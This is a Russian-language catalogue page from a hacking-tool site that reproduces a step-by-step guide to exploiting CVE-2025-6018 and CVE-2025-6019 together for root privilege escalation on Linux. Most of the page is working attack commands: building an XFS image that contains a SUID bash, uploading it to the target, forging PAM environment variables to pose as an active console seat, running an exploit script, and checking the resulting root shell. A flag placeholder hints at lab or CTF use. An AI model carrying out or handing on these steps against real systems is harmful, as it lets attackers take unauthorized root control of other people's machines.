Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — CVE-2025-6018 + CVE-2025-6019 Privilege Escalation Exploit | Kitploit
Инструменты/GitHubGitHub/muyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed TeamingBinary Exploitation
GitHubmuyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

CVE-2025-6018 + CVE-2025-6019 Privilege Escalation Exploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1216 месяцев назадЕщё не проверено

CVE-2025-6018 + CVE-2025-6019 Руководство по повышению привилегий

中文

📋 Быстрые шаги эксплуатации

Шаг 1: Подготовка XFS-образа (локальная машина)

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

Шаг 2: Загрузка файлов на цель

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

Шаг 3: Первый вход — настройка PAM

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Critical: Logout (to activate PAM config)
exit

Шаг 4: Второй вход — выполнение повышения привилегий

root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ Индикаторы успеха

Если эксплуатация успешна, вы должны увидеть:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 Устранение неполадок

ПроблемаРешение
CanReboot возвращает

📌 Ключевые моменты

  • ✅ Необходимо выйти и войти снова: конфигурация PAM действует только в новых сессиях
  • ✅ Проверьте CanReboot: убедитесь, что он возвращает ('yes',) перед запуском скрипта
  • ✅ Используйте SSH-вход: не используйте выполнение в стиле ssh -t user@host "cmd"

🐱 Кот-хранитель

Если что-то не получается, убедитесь, что каждый шаг выполняется строго по порядку!

Скачать инструмент
('no',)
Убедитесь, что вы вышли и вошли снова (Шаг 3)
Ошибка Not authorizedПроверьте, что содержимое ~/.pam_environment правильное
SUID bash не найденПовторно загрузите xfs.image и убедитесь, что установлен SUID-бит